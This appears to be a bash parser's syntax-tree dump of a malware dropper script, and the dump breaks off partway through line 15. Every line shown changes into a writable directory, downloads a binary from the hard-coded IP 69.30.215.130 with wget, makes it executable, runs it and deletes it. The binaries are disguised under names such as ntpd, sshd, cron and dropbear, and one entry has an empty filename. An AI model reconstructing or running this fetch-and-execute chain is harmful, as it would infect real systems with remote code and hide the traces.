ListNode(lineno=2, pos=(12, 133), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://69.30.215.130/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 112), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 112), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 120), parts=[
    WordNode(lineno=2, pos=(114, 120), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 133), parts=[
    WordNode(lineno=2, pos=(122, 124), word='rm'),
    WordNode(lineno=2, pos=(125, 128), word='-rf'),
    WordNode(lineno=2, pos=(129, 133), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(134, 255), parts=[
  CommandNode(lineno=3, pos=(134, 141), parts=[
    WordNode(lineno=3, pos=(134, 136), word='cd'),
    WordNode(lineno=3, pos=(137, 141), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(142, 144)),
  CommandNode(lineno=3, pos=(145, 156), parts=[
    WordNode(lineno=3, pos=(145, 147), word='cd'),
    WordNode(lineno=3, pos=(148, 156), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 179), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 179), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 187), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 187), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(187, 188)),
  CommandNode(lineno=3, pos=(189, 219), parts=[
    WordNode(lineno=3, pos=(189, 193), word='wget'),
    WordNode(lineno=3, pos=(194, 219), word='http://69.30.215.130/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(219, 220)),
  CommandNode(lineno=3, pos=(221, 234), parts=[
    WordNode(lineno=3, pos=(221, 226), word='chmod'),
    WordNode(lineno=3, pos=(227, 229), word='+x'),
    WordNode(lineno=3, pos=(230, 234), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(234, 235)),
  CommandNode(lineno=3, pos=(236, 242), parts=[
    WordNode(lineno=3, pos=(236, 242), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(242, 243)),
  CommandNode(lineno=3, pos=(244, 255), parts=[
    WordNode(lineno=3, pos=(244, 246), word='rm'),
    WordNode(lineno=3, pos=(247, 250), word='-rf'),
    WordNode(lineno=3, pos=(251, 255), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(256, 389), parts=[
  CommandNode(lineno=4, pos=(256, 263), parts=[
    WordNode(lineno=4, pos=(256, 258), word='cd'),
    WordNode(lineno=4, pos=(259, 263), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(264, 266)),
  CommandNode(lineno=4, pos=(267, 278), parts=[
    WordNode(lineno=4, pos=(267, 269), word='cd'),
    WordNode(lineno=4, pos=(270, 278), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(279, 281)),
  CommandNode(lineno=4, pos=(282, 289), parts=[
    WordNode(lineno=4, pos=(282, 284), word='cd'),
    WordNode(lineno=4, pos=(285, 289), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(290, 292)),
  CommandNode(lineno=4, pos=(293, 301), parts=[
    WordNode(lineno=4, pos=(293, 295), word='cd'),
    WordNode(lineno=4, pos=(296, 301), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(302, 304)),
  CommandNode(lineno=4, pos=(305, 309), parts=[
    WordNode(lineno=4, pos=(305, 307), word='cd'),
    WordNode(lineno=4, pos=(308, 309), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(309, 310)),
  CommandNode(lineno=4, pos=(311, 344), parts=[
    WordNode(lineno=4, pos=(311, 315), word='wget'),
    WordNode(lineno=4, pos=(316, 344), word='http://69.30.215.130/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(344, 345)),
  CommandNode(lineno=4, pos=(346, 362), parts=[
    WordNode(lineno=4, pos=(346, 351), word='chmod'),
    WordNode(lineno=4, pos=(352, 354), word='+x'),
    WordNode(lineno=4, pos=(355, 362), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 373), parts=[
    WordNode(lineno=4, pos=(364, 373), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(373, 374)),
  CommandNode(lineno=4, pos=(375, 389), parts=[
    WordNode(lineno=4, pos=(375, 377), word='rm'),
    WordNode(lineno=4, pos=(378, 381), word='-rf'),
    WordNode(lineno=4, pos=(382, 389), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(390, 511), parts=[
  CommandNode(lineno=5, pos=(390, 397), parts=[
    WordNode(lineno=5, pos=(390, 392), word='cd'),
    WordNode(lineno=5, pos=(393, 397), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(398, 400)),
  CommandNode(lineno=5, pos=(401, 412), parts=[
    WordNode(lineno=5, pos=(401, 403), word='cd'),
    WordNode(lineno=5, pos=(404, 412), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(413, 415)),
  CommandNode(lineno=5, pos=(416, 423), parts=[
    WordNode(lineno=5, pos=(416, 418), word='cd'),
    WordNode(lineno=5, pos=(419, 423), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(424, 426)),
  CommandNode(lineno=5, pos=(427, 435), parts=[
    WordNode(lineno=5, pos=(427, 429), word='cd'),
    WordNode(lineno=5, pos=(430, 435), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(436, 438)),
  CommandNode(lineno=5, pos=(439, 443), parts=[
    WordNode(lineno=5, pos=(439, 441), word='cd'),
    WordNode(lineno=5, pos=(442, 443), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(443, 444)),
  CommandNode(lineno=5, pos=(445, 475), parts=[
    WordNode(lineno=5, pos=(445, 449), word='wget'),
    WordNode(lineno=5, pos=(450, 475), word='http://69.30.215.130/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(475, 476)),
  CommandNode(lineno=5, pos=(477, 490), parts=[
    WordNode(lineno=5, pos=(477, 482), word='chmod'),
    WordNode(lineno=5, pos=(483, 485), word='+x'),
    WordNode(lineno=5, pos=(486, 490), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(490, 491)),
  CommandNode(lineno=5, pos=(492, 498), parts=[
    WordNode(lineno=5, pos=(492, 498), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(498, 499)),
  CommandNode(lineno=5, pos=(500, 511), parts=[
    WordNode(lineno=5, pos=(500, 502), word='rm'),
    WordNode(lineno=5, pos=(503, 506), word='-rf'),
    WordNode(lineno=5, pos=(507, 511), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(512, 633), parts=[
  CommandNode(lineno=6, pos=(512, 519), parts=[
    WordNode(lineno=6, pos=(512, 514), word='cd'),
    WordNode(lineno=6, pos=(515, 519), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(520, 522)),
  CommandNode(lineno=6, pos=(523, 534), parts=[
    WordNode(lineno=6, pos=(523, 525), word='cd'),
    WordNode(lineno=6, pos=(526, 534), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(535, 537)),
  CommandNode(lineno=6, pos=(538, 545), parts=[
    WordNode(lineno=6, pos=(538, 540), word='cd'),
    WordNode(lineno=6, pos=(541, 545), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 557), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 557), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(558, 560)),
  CommandNode(lineno=6, pos=(561, 565), parts=[
    WordNode(lineno=6, pos=(561, 563), word='cd'),
    WordNode(lineno=6, pos=(564, 565), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(565, 566)),
  CommandNode(lineno=6, pos=(567, 597), parts=[
    WordNode(lineno=6, pos=(567, 571), word='wget'),
    WordNode(lineno=6, pos=(572, 597), word='http://69.30.215.130/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(597, 598)),
  CommandNode(lineno=6, pos=(599, 612), parts=[
    WordNode(lineno=6, pos=(599, 604), word='chmod'),
    WordNode(lineno=6, pos=(605, 607), word='+x'),
    WordNode(lineno=6, pos=(608, 612), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(612, 613)),
  CommandNode(lineno=6, pos=(614, 620), parts=[
    WordNode(lineno=6, pos=(614, 620), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(620, 621)),
  CommandNode(lineno=6, pos=(622, 633), parts=[
    WordNode(lineno=6, pos=(622, 624), word='rm'),
    WordNode(lineno=6, pos=(625, 628), word='-rf'),
    WordNode(lineno=6, pos=(629, 633), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(634, 763), parts=[
  CommandNode(lineno=7, pos=(634, 641), parts=[
    WordNode(lineno=7, pos=(634, 636), word='cd'),
    WordNode(lineno=7, pos=(637, 641), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(642, 644)),
  CommandNode(lineno=7, pos=(645, 656), parts=[
    WordNode(lineno=7, pos=(645, 647), word='cd'),
    WordNode(lineno=7, pos=(648, 656), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(657, 659)),
  CommandNode(lineno=7, pos=(660, 667), parts=[
    WordNode(lineno=7, pos=(660, 662), word='cd'),
    WordNode(lineno=7, pos=(663, 667), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(668, 670)),
  CommandNode(lineno=7, pos=(671, 679), parts=[
    WordNode(lineno=7, pos=(671, 673), word='cd'),
    WordNode(lineno=7, pos=(674, 679), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(680, 682)),
  CommandNode(lineno=7, pos=(683, 687), parts=[
    WordNode(lineno=7, pos=(683, 685), word='cd'),
    WordNode(lineno=7, pos=(686, 687), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(687, 688)),
  CommandNode(lineno=7, pos=(689, 721), parts=[
    WordNode(lineno=7, pos=(689, 693), word='wget'),
    WordNode(lineno=7, pos=(694, 721), word='http://69.30.215.130/pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(721, 722)),
  CommandNode(lineno=7, pos=(723, 738), parts=[
    WordNode(lineno=7, pos=(723, 728), word='chmod'),
    WordNode(lineno=7, pos=(729, 731), word='+x'),
    WordNode(lineno=7, pos=(732, 738), word='pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(738, 739)),
  CommandNode(lineno=7, pos=(740, 748), parts=[
    WordNode(lineno=7, pos=(740, 748), word='./pstree'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(748, 749)),
  CommandNode(lineno=7, pos=(750, 763), parts=[
    WordNode(lineno=7, pos=(750, 752), word='rm'),
    WordNode(lineno=7, pos=(753, 756), word='-rf'),
    WordNode(lineno=7, pos=(757, 763), word='pstree'),
  ]),
])
ListNode(lineno=8, pos=(764, 901), parts=[
  CommandNode(lineno=8, pos=(764, 771), parts=[
    WordNode(lineno=8, pos=(764, 766), word='cd'),
    WordNode(lineno=8, pos=(767, 771), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(772, 774)),
  CommandNode(lineno=8, pos=(775, 786), parts=[
    WordNode(lineno=8, pos=(775, 777), word='cd'),
    WordNode(lineno=8, pos=(778, 786), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(787, 789)),
  CommandNode(lineno=8, pos=(790, 797), parts=[
    WordNode(lineno=8, pos=(790, 792), word='cd'),
    WordNode(lineno=8, pos=(793, 797), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(798, 800)),
  CommandNode(lineno=8, pos=(801, 809), parts=[
    WordNode(lineno=8, pos=(801, 803), word='cd'),
    WordNode(lineno=8, pos=(804, 809), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(810, 812)),
  CommandNode(lineno=8, pos=(813, 817), parts=[
    WordNode(lineno=8, pos=(813, 815), word='cd'),
    WordNode(lineno=8, pos=(816, 817), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(817, 818)),
  CommandNode(lineno=8, pos=(819, 853), parts=[
    WordNode(lineno=8, pos=(819, 823), word='wget'),
    WordNode(lineno=8, pos=(824, 853), word='http://69.30.215.130/dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(853, 854)),
  CommandNode(lineno=8, pos=(855, 872), parts=[
    WordNode(lineno=8, pos=(855, 860), word='chmod'),
    WordNode(lineno=8, pos=(861, 863), word='+x'),
    WordNode(lineno=8, pos=(864, 872), word='dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(872, 873)),
  CommandNode(lineno=8, pos=(874, 884), parts=[
    WordNode(lineno=8, pos=(874, 884), word='./dropbear'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(884, 885)),
  CommandNode(lineno=8, pos=(886, 901), parts=[
    WordNode(lineno=8, pos=(886, 888), word='rm'),
    WordNode(lineno=8, pos=(889, 892), word='-rf'),
    WordNode(lineno=8, pos=(893, 901), word='dropbear'),
  ]),
])
ListNode(lineno=9, pos=(902, 1023), parts=[
  CommandNode(lineno=9, pos=(902, 909), parts=[
    WordNode(lineno=9, pos=(902, 904), word='cd'),
    WordNode(lineno=9, pos=(905, 909), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(910, 912)),
  CommandNode(lineno=9, pos=(913, 924), parts=[
    WordNode(lineno=9, pos=(913, 915), word='cd'),
    WordNode(lineno=9, pos=(916, 924), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(925, 927)),
  CommandNode(lineno=9, pos=(928, 935), parts=[
    WordNode(lineno=9, pos=(928, 930), word='cd'),
    WordNode(lineno=9, pos=(931, 935), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(936, 938)),
  CommandNode(lineno=9, pos=(939, 947), parts=[
    WordNode(lineno=9, pos=(939, 941), word='cd'),
    WordNode(lineno=9, pos=(942, 947), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(948, 950)),
  CommandNode(lineno=9, pos=(951, 955), parts=[
    WordNode(lineno=9, pos=(951, 953), word='cd'),
    WordNode(lineno=9, pos=(954, 955), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(955, 956)),
  CommandNode(lineno=9, pos=(957, 987), parts=[
    WordNode(lineno=9, pos=(957, 961), word='wget'),
    WordNode(lineno=9, pos=(962, 987), word='http://69.30.215.130/wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(987, 988)),
  CommandNode(lineno=9, pos=(989, 1002), parts=[
    WordNode(lineno=9, pos=(989, 994), word='chmod'),
    WordNode(lineno=9, pos=(995, 997), word='+x'),
    WordNode(lineno=9, pos=(998, 1002), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1002, 1003)),
  CommandNode(lineno=9, pos=(1004, 1010), parts=[
    WordNode(lineno=9, pos=(1004, 1010), word='./wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1010, 1011)),
  CommandNode(lineno=9, pos=(1012, 1023), parts=[
    WordNode(lineno=9, pos=(1012, 1014), word='rm'),
    WordNode(lineno=9, pos=(1015, 1018), word='-rf'),
    WordNode(lineno=9, pos=(1019, 1023), word='wget'),
  ]),
])
ListNode(lineno=10, pos=(1024, 1145), parts=[
  CommandNode(lineno=10, pos=(1024, 1031), parts=[
    WordNode(lineno=10, pos=(1024, 1026), word='cd'),
    WordNode(lineno=10, pos=(1027, 1031), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1032, 1034)),
  CommandNode(lineno=10, pos=(1035, 1046), parts=[
    WordNode(lineno=10, pos=(1035, 1037), word='cd'),
    WordNode(lineno=10, pos=(1038, 1046), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1047, 1049)),
  CommandNode(lineno=10, pos=(1050, 1057), parts=[
    WordNode(lineno=10, pos=(1050, 1052), word='cd'),
    WordNode(lineno=10, pos=(1053, 1057), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1058, 1060)),
  CommandNode(lineno=10, pos=(1061, 1069), parts=[
    WordNode(lineno=10, pos=(1061, 1063), word='cd'),
    WordNode(lineno=10, pos=(1064, 1069), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1070, 1072)),
  CommandNode(lineno=10, pos=(1073, 1077), parts=[
    WordNode(lineno=10, pos=(1073, 1075), word='cd'),
    WordNode(lineno=10, pos=(1076, 1077), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1077, 1078)),
  CommandNode(lineno=10, pos=(1079, 1109), parts=[
    WordNode(lineno=10, pos=(1079, 1083), word='wget'),
    WordNode(lineno=10, pos=(1084, 1109), word='http://69.30.215.130/cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1109, 1110)),
  CommandNode(lineno=10, pos=(1111, 1124), parts=[
    WordNode(lineno=10, pos=(1111, 1116), word='chmod'),
    WordNode(lineno=10, pos=(1117, 1119), word='+x'),
    WordNode(lineno=10, pos=(1120, 1124), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1124, 1125)),
  CommandNode(lineno=10, pos=(1126, 1132), parts=[
    WordNode(lineno=10, pos=(1126, 1132), word='./cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1132, 1133)),
  CommandNode(lineno=10, pos=(1134, 1145), parts=[
    WordNode(lineno=10, pos=(1134, 1136), word='rm'),
    WordNode(lineno=10, pos=(1137, 1140), word='-rf'),
    WordNode(lineno=10, pos=(1141, 1145), word='cron'),
  ]),
])
ListNode(lineno=11, pos=(1146, 1263), parts=[
  CommandNode(lineno=11, pos=(1146, 1153), parts=[
    WordNode(lineno=11, pos=(1146, 1148), word='cd'),
    WordNode(lineno=11, pos=(1149, 1153), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1154, 1156)),
  CommandNode(lineno=11, pos=(1157, 1168), parts=[
    WordNode(lineno=11, pos=(1157, 1159), word='cd'),
    WordNode(lineno=11, pos=(1160, 1168), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1169, 1171)),
  CommandNode(lineno=11, pos=(1172, 1179), parts=[
    WordNode(lineno=11, pos=(1172, 1174), word='cd'),
    WordNode(lineno=11, pos=(1175, 1179), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1180, 1182)),
  CommandNode(lineno=11, pos=(1183, 1191), parts=[
    WordNode(lineno=11, pos=(1183, 1185), word='cd'),
    WordNode(lineno=11, pos=(1186, 1191), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1192, 1194)),
  CommandNode(lineno=11, pos=(1195, 1199), parts=[
    WordNode(lineno=11, pos=(1195, 1197), word='cd'),
    WordNode(lineno=11, pos=(1198, 1199), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1199, 1200)),
  CommandNode(lineno=11, pos=(1201, 1230), parts=[
    WordNode(lineno=11, pos=(1201, 1205), word='wget'),
    WordNode(lineno=11, pos=(1206, 1230), word='http://69.30.215.130/ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1230, 1231)),
  CommandNode(lineno=11, pos=(1232, 1244), parts=[
    WordNode(lineno=11, pos=(1232, 1237), word='chmod'),
    WordNode(lineno=11, pos=(1238, 1240), word='+x'),
    WordNode(lineno=11, pos=(1241, 1244), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1244, 1245)),
  CommandNode(lineno=11, pos=(1246, 1251), parts=[
    WordNode(lineno=11, pos=(1246, 1251), word='./ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1251, 1252)),
  CommandNode(lineno=11, pos=(1253, 1263), parts=[
    WordNode(lineno=11, pos=(1253, 1255), word='rm'),
    WordNode(lineno=11, pos=(1256, 1259), word='-rf'),
    WordNode(lineno=11, pos=(1260, 1263), word='ftp'),
  ]),
])
ListNode(lineno=12, pos=(1264, 1385), parts=[
  CommandNode(lineno=12, pos=(1264, 1271), parts=[
    WordNode(lineno=12, pos=(1264, 1266), word='cd'),
    WordNode(lineno=12, pos=(1267, 1271), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1272, 1274)),
  CommandNode(lineno=12, pos=(1275, 1286), parts=[
    WordNode(lineno=12, pos=(1275, 1277), word='cd'),
    WordNode(lineno=12, pos=(1278, 1286), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1287, 1289)),
  CommandNode(lineno=12, pos=(1290, 1297), parts=[
    WordNode(lineno=12, pos=(1290, 1292), word='cd'),
    WordNode(lineno=12, pos=(1293, 1297), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1298, 1300)),
  CommandNode(lineno=12, pos=(1301, 1309), parts=[
    WordNode(lineno=12, pos=(1301, 1303), word='cd'),
    WordNode(lineno=12, pos=(1304, 1309), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1310, 1312)),
  CommandNode(lineno=12, pos=(1313, 1317), parts=[
    WordNode(lineno=12, pos=(1313, 1315), word='cd'),
    WordNode(lineno=12, pos=(1316, 1317), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1317, 1318)),
  CommandNode(lineno=12, pos=(1319, 1349), parts=[
    WordNode(lineno=12, pos=(1319, 1323), word='wget'),
    WordNode(lineno=12, pos=(1324, 1349), word='http://69.30.215.130/pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1349, 1350)),
  CommandNode(lineno=12, pos=(1351, 1364), parts=[
    WordNode(lineno=12, pos=(1351, 1356), word='chmod'),
    WordNode(lineno=12, pos=(1357, 1359), word='+x'),
    WordNode(lineno=12, pos=(1360, 1364), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1364, 1365)),
  CommandNode(lineno=12, pos=(1366, 1372), parts=[
    WordNode(lineno=12, pos=(1366, 1372), word='./pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1372, 1373)),
  CommandNode(lineno=12, pos=(1374, 1385), parts=[
    WordNode(lineno=12, pos=(1374, 1376), word='rm'),
    WordNode(lineno=12, pos=(1377, 1380), word='-rf'),
    WordNode(lineno=12, pos=(1381, 1385), word='pftp'),
  ]),
])
ListNode(lineno=13, pos=(1386, 1499), parts=[
  CommandNode(lineno=13, pos=(1386, 1393), parts=[
    WordNode(lineno=13, pos=(1386, 1388), word='cd'),
    WordNode(lineno=13, pos=(1389, 1393), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1394, 1396)),
  CommandNode(lineno=13, pos=(1397, 1408), parts=[
    WordNode(lineno=13, pos=(1397, 1399), word='cd'),
    WordNode(lineno=13, pos=(1400, 1408), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1409, 1411)),
  CommandNode(lineno=13, pos=(1412, 1419), parts=[
    WordNode(lineno=13, pos=(1412, 1414), word='cd'),
    WordNode(lineno=13, pos=(1415, 1419), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1420, 1422)),
  CommandNode(lineno=13, pos=(1423, 1431), parts=[
    WordNode(lineno=13, pos=(1423, 1425), word='cd'),
    WordNode(lineno=13, pos=(1426, 1431), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1432, 1434)),
  CommandNode(lineno=13, pos=(1435, 1439), parts=[
    WordNode(lineno=13, pos=(1435, 1437), word='cd'),
    WordNode(lineno=13, pos=(1438, 1439), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1439, 1440)),
  CommandNode(lineno=13, pos=(1441, 1469), parts=[
    WordNode(lineno=13, pos=(1441, 1445), word='wget'),
    WordNode(lineno=13, pos=(1446, 1469), word='http://69.30.215.130/sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1469, 1470)),
  CommandNode(lineno=13, pos=(1471, 1482), parts=[
    WordNode(lineno=13, pos=(1471, 1476), word='chmod'),
    WordNode(lineno=13, pos=(1477, 1479), word='+x'),
    WordNode(lineno=13, pos=(1480, 1482), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1482, 1483)),
  CommandNode(lineno=13, pos=(1484, 1488), parts=[
    WordNode(lineno=13, pos=(1484, 1488), word='./sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1488, 1489)),
  CommandNode(lineno=13, pos=(1490, 1499), parts=[
    WordNode(lineno=13, pos=(1490, 1492), word='rm'),
    WordNode(lineno=13, pos=(1493, 1496), word='-rf'),
    WordNode(lineno=13, pos=(1497, 1499), word='sh'),
  ]),
])
ListNode(lineno=14, pos=(1500, 1617), parts=[
  CommandNode(lineno=14, pos=(1500, 1507), parts=[
    WordNode(lineno=14, pos=(1500, 1502), word='cd'),
    WordNode(lineno=14, pos=(1503, 1507), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1508, 1510)),
  CommandNode(lineno=14, pos=(1511, 1522), parts=[
    WordNode(lineno=14, pos=(1511, 1513), word='cd'),
    WordNode(lineno=14, pos=(1514, 1522), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1523, 1525)),
  CommandNode(lineno=14, pos=(1526, 1533), parts=[
    WordNode(lineno=14, pos=(1526, 1528), word='cd'),
    WordNode(lineno=14, pos=(1529, 1533), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1534, 1536)),
  CommandNode(lineno=14, pos=(1537, 1545), parts=[
    WordNode(lineno=14, pos=(1537, 1539), word='cd'),
    WordNode(lineno=14, pos=(1540, 1545), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1546, 1548)),
  CommandNode(lineno=14, pos=(1549, 1553), parts=[
    WordNode(lineno=14, pos=(1549, 1551), word='cd'),
    WordNode(lineno=14, pos=(1552, 1553), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1553, 1554)),
  CommandNode(lineno=14, pos=(1555, 1584), parts=[
    WordNode(lineno=14, pos=(1555, 1559), word='wget'),
    WordNode(lineno=14, pos=(1560, 1584), word='http://69.30.215.130/ '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1584, 1585)),
  CommandNode(lineno=14, pos=(1586, 1598), parts=[
    WordNode(lineno=14, pos=(1586, 1591), word='chmod'),
    WordNode(lineno=14, pos=(1592, 1594), word='+x'),
    WordNode(lineno=14, pos=(1595, 1598), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1598, 1599)),
  CommandNode(lineno=14, pos=(1600, 1605), parts=[
    WordNode(lineno=14, pos=(1600, 1605), word='./ '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1605, 1606)),
  CommandNode(lineno=14, pos=(1607, 1617), parts=[
    WordNode(lineno=14, pos=(1607, 1609), word='rm'),
    WordNode(lineno=14, pos=(1610, 1613), word='-rf'),
    WordNode(lineno=14, pos=(1614, 1617), word=' '),
  ]),
])
ListNode(lineno=15, pos=(1618, 1751), parts=[
  CommandNode(lineno=15, pos=(1618, 1625), parts=[
    WordNode(lineno=15, pos=(1618, 1620), word='cd'),
    WordNode(lineno=15, pos=(1621, 1625), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1626, 1628)),
  CommandNode(lineno=15, pos=(1629, 1640), parts=[
    WordNode(lineno=15, pos=(1629, 1631), word='cd'),
    WordNode(lineno=15, pos=(1632, 1640), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1641, 1643)),
  CommandNode(lineno=15, pos=(1644, 1651), parts=[
